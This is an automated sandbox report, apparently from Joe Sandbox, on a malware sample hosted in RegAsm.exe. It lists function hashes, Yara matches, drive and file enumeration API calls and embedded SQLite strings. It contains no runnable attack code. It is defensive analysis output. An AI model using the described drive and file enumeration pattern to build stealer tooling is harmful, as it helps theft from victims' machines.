                                                    • Instruction ID: c786e49f586b1f7bfa14472e80742ecc44eb45db75607d08161972db837cb069
                                                    • Opcode Fuzzy Hash: e2b85eadb093ec973f3d2cf701caf6266cf0745fef5b918c247462645373d3d4
                                                    • Instruction Fuzzy Hash: 25413C7290421CABCF10AFA0DD49EDA77BDBB05304F4444AAB619E2050EB79DAD48F64
                                                    Function 1FA4B400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                    • API String ID: 0-3496276579
                                                    • Opcode ID: 8c557603c04734963f1c87022e6ccfb9af84bad9395d1d172be97ea96f0fbcc4
                                                    • Instruction ID: 2434a2b30f13b0d97306ad69d76333806308bdcc4522bd39af0286ce0401054b
                                                    • Opcode Fuzzy Hash: 8c557603c04734963f1c87022e6ccfb9af84bad9395d1d172be97ea96f0fbcc4
                                                    • Instruction Fuzzy Hash: 3CC130759007419BC7118F24D8407ABB7F4FF84390F6C092EE89A8A651E73EF559CBA2
                                                    Function 004169EC Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 158stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416A5A
                                                    • memset.MSVCRT ref: 00416AB0
                                                    • GetDriveTypeA.KERNEL32(?), ref: 00416ACA
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416AF5
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Drivelstrcpy$LogicalStringsTypememset
                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$lA
                                                    • API String ID: 3016464087-2583277952
                                                    • Opcode ID: f599dcda9ae328e574b15c0b48bb15f073491a9be348feaa9ea89fd0c42b52f9
                                                    • Instruction ID: d8c264c8c93a54a00a67460d45cdb6232450a29fbc4f44d3c7e660ca34806ed9
                                                    • Opcode Fuzzy Hash: f599dcda9ae328e574b15c0b48bb15f073491a9be348feaa9ea89fd0c42b52f9
                                                    • Instruction Fuzzy Hash: 325140B1910218EBDF20EFB0CC55BED7778BF14309F50405AFA19A61A1DB399A89CF58
                                                    Function 1FA9DB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 583e7b278f7505d135c3f3b2da7b4a2d442f5c1c7fe9b66afa3ac58674753625
                                                    • Instruction ID: 850cb209864232a1ec50960ed9e72ca2d8c3918a6b6df00df3541f2844236365
                                                    • Opcode Fuzzy Hash: 583e7b278f7505d135c3f3b2da7b4a2d442f5c1c7fe9b66afa3ac58674753625
                                                    • Instruction Fuzzy Hash: 5A81DF75604301ABE7109F68CD90B6BB3E9FF84714F44083CF9859B240E67EF9928B92
                                                    Function 1FA50FB0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e
                                                    • API String ID: 0-4024072794
                                                    • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                    • Instruction ID: b90f639795448d4c6a9ea6702fa58c985157a264aa8721c5067b64af446b025c
                                                    • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                    • Instruction Fuzzy Hash: 9D5113767083419FDB04CE28CC80A7BB7E5FF85212F10456EF8858A561E73AF858C7A1
                                                    Function 1FA9DFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %lld %lld
                                                    • API String ID: 0-3794783949
                                                    • Opcode ID: f9f27324bda0764b89f734ba8e53ddadfc07be361caa7dd9bbe1aa727897de53
                                                    • Instruction ID: b9df12505259d9050ccafd60302d4db0fdeeb177603b4c5cad02fa9070d665d3
                                                    • Opcode Fuzzy Hash: f9f27324bda0764b89f734ba8e53ddadfc07be361caa7dd9bbe1aa727897de53
                                                    • Instruction Fuzzy Hash: BE31C0793043007BE7115B288D85F6B77EEEF80720F504828FA9596252F67EE91287A2
                                                    Function 1FB414D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB415B1
                                                    • misuse, xrefs: 1FB415AC
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB415A2
                                                    • API called with NULL prepared statement, xrefs: 1FB41571
                                                    • API called with finalized prepared statement, xrefs: 1FB41586
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 56a6d2d744ff1ac0e8d418b929bc9d3e53ca57d7ef571795a1a75e396fd8481e
                                                    • Instruction ID: 6e8100b2c26aedc270f6366182ce82d7a6a768111b8f13b9b64cbaaad0b7e426
                                                    • Opcode Fuzzy Hash: 56a6d2d744ff1ac0e8d418b929bc9d3e53ca57d7ef571795a1a75e396fd8481e
                                                    • Instruction Fuzzy Hash: 3DC1E4B4F047419BE7228F24EE44B9777E4EF40354F24052CE89B9B242E77AF4499792
                                                    Function 1FB4D4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB4D5EC
                                                    • misuse, xrefs: 1FB4D5E7
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB4D5DD
                                                    • API called with NULL prepared statement, xrefs: 1FB4D5AC
                                                    • API called with finalized prepared statement, xrefs: 1FB4D5C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 52f20dfff83a5c9fcd636906d457777492bf07a12516d16ba056680d4d67f301
                                                    • Instruction ID: 320d22b5e2fc4a0f86bc88458931cb9b284f2e9df10404008c02d64dd464d578
                                                    • Opcode Fuzzy Hash: 52f20dfff83a5c9fcd636906d457777492bf07a12516d16ba056680d4d67f301
                                                    • Instruction Fuzzy Hash: 76B1D1B49047019FE7108F24E954B9777E4FF49318F20492CE89A8B341E77AF449DBA2
                                                    Function 0040D690 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 373fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0040D6AE
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040D6C5
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040D71B
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040D731
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DC3C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040DC50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\*.*
                                                    • API String ID: 180737720-1013718255
                                                    • Opcode ID: ef98e4475f349dce152c3307f6babed54af638ba4ea8ac52c64afd0e42f406ea
                                                    • Instruction ID: 442cfaa05b2ab3e60d623e1441183a9edc218a7dbb6c4317de4ad030bb5ceac8
                                                    • Opcode Fuzzy Hash: ef98e4475f349dce152c3307f6babed54af638ba4ea8ac52c64afd0e42f406ea
                                                    • Instruction Fuzzy Hash: 47E104719012189ADB54FB61DC92EEE7378AF15305F4001ABF51AA21E2EF389BC9CF54
                                                    Function 1FB04D40 Relevance: 14.0, APIs: 9, Instructions: 476COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44fdb31c6bcd16521c46d6c3e8f892d7f6f0e33c6a4c5005b50ed2a9a40eda65
                                                    • Instruction ID: 9c21a954c137a937d002614eb21ad8e1807dd75ab7713a51f2ab01f0aa658e84
                                                    • Opcode Fuzzy Hash: 44fdb31c6bcd16521c46d6c3e8f892d7f6f0e33c6a4c5005b50ed2a9a40eda65
                                                    • Instruction Fuzzy Hash: 73F113B06043029FD710AF25DD84A6BBBF9EF81724F04066CFA4586341E77AF955CBA2
                                                    Function 0040BC98 Relevance: 13.8, APIs: 9, Instructions: 254fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00428F3C,00425200), ref: 0040BD03
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040BD4E
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040BD64
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040BFF5
                                                    • FindClose.KERNEL32(000000FF), ref: 0040C006
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID:
                                                    • API String ID: 3334442632-0
                                                    • Opcode ID: c5f616f5eda3dafb28c7c0f1b4bdc6c9cd7d361c0a4f4321f54fe511707648ce
                                                    • Instruction ID: 4555b4d589cef043fd56f714ee56fa9ade97253f9cab423876852d2fa7fbf640
                                                    • Opcode Fuzzy Hash: c5f616f5eda3dafb28c7c0f1b4bdc6c9cd7d361c0a4f4321f54fe511707648ce
                                                    • Instruction Fuzzy Hash: D0914072A001089BCF14FBB1DC56AED737CAB55304F40417AE916D61E1EF399B88CB99
                                                    Function 0040E016 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 279fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00428F3C,00425200,?,?), ref: 0040E083
                                                    • StrCmpCA.SHLWAPI(?,00425240,?,?), ref: 0040E0CE
                                                    • StrCmpCA.SHLWAPI(?,0042523C,?,?), ref: 0040E0E4
                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?), ref: 0040E3F8
                                                    • FindClose.KERNEL32(000000FF,?,?), ref: 0040E409
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
